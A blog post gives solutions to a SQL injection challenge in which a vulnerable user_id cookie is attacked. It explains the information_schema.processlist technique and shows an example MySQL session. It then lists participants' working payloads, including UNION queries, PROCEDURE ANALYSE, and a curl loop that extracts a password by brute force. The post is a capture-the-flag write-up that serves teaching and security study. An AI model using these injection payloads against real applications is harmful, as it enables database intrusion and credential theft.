Solutions for challenge 2B

Posted on August 16, 2012 by Roberto Salgado

After posting the solutions for challenge 2A from the series of SQL Injection challenges, it only made sense to continue with 2B, since 'B' is a slightly more difficult variation of 'A'. Challenge 2B is probably my favorite challenge: it is very simple, yet it confused many participants.

DISCLAIMER: If you haven't tried this challenge, it was available here (the link is no longer online) in case you want to give it a shot before reading the SOLUTIONS below.

This challenge, like 2A, lets you log in as guest and sets a user_id cookie that is vulnerable to SQL Injection. Initially no filtering was applied, since the idea behind the challenge was to find different ways of retrieving the table and column names. The tricky part is that the credentials live in a temporary table, and that temp table only exists for the duration of the PHP script's database connection. MySQL temporary tables are per-connection and are not listed in information_schema.tables or information_schema.columns, so this was the perfect way of forcing participants to find other methods of obtaining the table and column names.

The intended solution is information_schema.processlist, available since MySQL 5.1. Its info column holds the full text of the statement each connection is currently executing (unlike plain SHOW PROCESSLIST, which truncates to 100 characters), and a connection can always see its own thread without the PROCESS privilege. Since the injected statement is the one running at that moment, a union select info from information_schema.processlist returns the whole vulnerable query, real table and column names included. This is extremely useful when table_name/column_name are being blocked by a WAF/IDS. Because the original query selects two columns, a working payload has to pad the union to two columns (union select info,2 ...), as most of the submitted solutions below do; the skeleton payload and the resulting statement look like this:


-1 union select info from information_schema.processlist

SELECT websec_rocks_temp_username, websec_rocks_temp_user_priv FROM websec_rocks_temp_uzuAr1Os WHERE websec_rocks_temp_user_id = -1 union select info from information_schema.processlist
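To show the mechanism end to end, here is an added MySQL session that is not part of the original challenge code. It creates a temporary table with the column layout implied by the query above (the password column name and the row contents are assumptions), shows that information_schema.tables and information_schema.columns stay empty for it, and then runs the injected statement so that processlist.info hands back the full query text. Filtering on CONNECTION_ID() is an addition that keeps other sessions' queries out of the result and works without the PROCESS privilege.

```sql
-- Added example, not the challenge's own code. Names follow the query shown
-- above; the password column and the rows are assumptions.
CREATE TEMPORARY TABLE websec_rocks_temp_uzuAr1Os (
  websec_rocks_temp_user_id   INT,
  websec_rocks_temp_username  VARCHAR(32),
  websec_rocks_temp_user_priv VARCHAR(32),
  websec_rocks_temp_password  VARCHAR(32)
);
INSERT INTO websec_rocks_temp_uzuAr1Os VALUES
  (0, 'guest', 'GUEST', 'guestpass'),
  (1, 'admin', 'ADMIN', 'secret');

-- Temporary tables are per-connection and are not catalogued: both queries
-- return an empty set, so the usual information_schema enumeration fails.
SELECT table_name  FROM information_schema.tables
 WHERE table_name LIKE 'websec_rocks_temp%';
SELECT column_name FROM information_schema.columns
 WHERE table_name LIKE 'websec_rocks_temp%';

-- What the vulnerable PHP ends up executing for the cookie
--   user_id=-1 union select info,2 from information_schema.processlist
-- The first SELECT yields no rows; the UNION half reads this connection's
-- own thread, whose info column is the text of this very statement, so the
-- response leaks the real table and column names. The literal 2 pads the
-- UNION to the two columns of the original query.
SELECT websec_rocks_temp_username, websec_rocks_temp_user_priv
  FROM websec_rocks_temp_uzuAr1Os
 WHERE websec_rocks_temp_user_id = -1
 UNION
SELECT info, 2
  FROM information_schema.processlist
 WHERE id = CONNECTION_ID();

-- With the names recovered, the rest is ordinary boolean-based extraction,
-- e.g. the length check the participants used before walking the value
-- with LIKE; a row comes back only when the condition holds.
SELECT websec_rocks_temp_username, websec_rocks_temp_user_priv
  FROM websec_rocks_temp_uzuAr1Os
 WHERE websec_rocks_temp_user_id = 1
   AND LENGTH(websec_rocks_temp_password) = 6;
```

Run it in one mysql client session: the temporary table disappears as soon as the connection closes, which is exactly why the challenge's table never shows up in information_schema from a later request, while the processlist trick works from inside the same request.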

Challenge Modifications

After w00d's and Miroslav's solutions, I made two slight adjustments to the challenge so that it would be solved as intended. w00d's solution used PROCEDURE ANALYSE(), whose Field_name output lists each column as db.table.column, so I blocked the word 'PROCEDURE', since this method is already documented on The SQL Injection KB (note that PROCEDURE ANALYSE() was removed in MySQL 8.0); w00d later submitted a solution using the intended method. Miroslav found the column name through a dictionary attack using the txt/common-columns.txt file from sqlmap. The second modification was therefore to change the column names so they could no longer be guessed.




user_id= 3 union select 1,2,concat_ws(0x3a,command,time,state,info),4 from information_schema.processlist limit 1-- -





curl -i --cookie "user_id=0 limit 3,1 PROCEDURE ANALYSE()"

curl -i --cookie "user_id=-1 union select group_concat(info),2 from information_schema.processlist"

Miroslav Stampar:


user_id=0 AND ORD(MID(temp_password,17,1))>1 LIMIT 0,1


user_id=-1 union select info,'padding' from information_schema.processlist#


user_id=0+and+1=0+union+select+1,unhex(hex(concat_ws(0x3a,info,state)))+from information_schema.processlist limit 0,1

user_id=0 and websec_rocks_temp_password like 'a%'


Used processlist

user_id=0 and websec_rocks_temp_password like '%'


Used processlist

for i in {4,5,6,7} ; do for j in {0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f} ; do curl -b "user_id=-9 or websec_rocks_temp_password LIKE 0x454c5f4d55595f56455247${i}${j}25" 2>&1 | grep ADMIN ; echo $i$j ;done; done


user_id=-1 union select info,2 from information_schema.processlist limit 1;

user_id=0 and (@:=websec_rocks_temp_password) union select @,1;


user_id=5 UNION select 1,(select info from information_schema.processlist LIMIT 1)

Same script from challenge 2A.


Used processlist


Submitted a Python script found here.


user_id=-1 union select 1,info from information_schema.PROCESSLIST limit 0,1#

user_id=0 and LENGTH(websec_rocks_temp_password)=16#

user_id=0 and websec_rocks_temp_password like 0x25656c5f6d75795f76657267756974617325#


A full list of the victors for each challenge is available here.
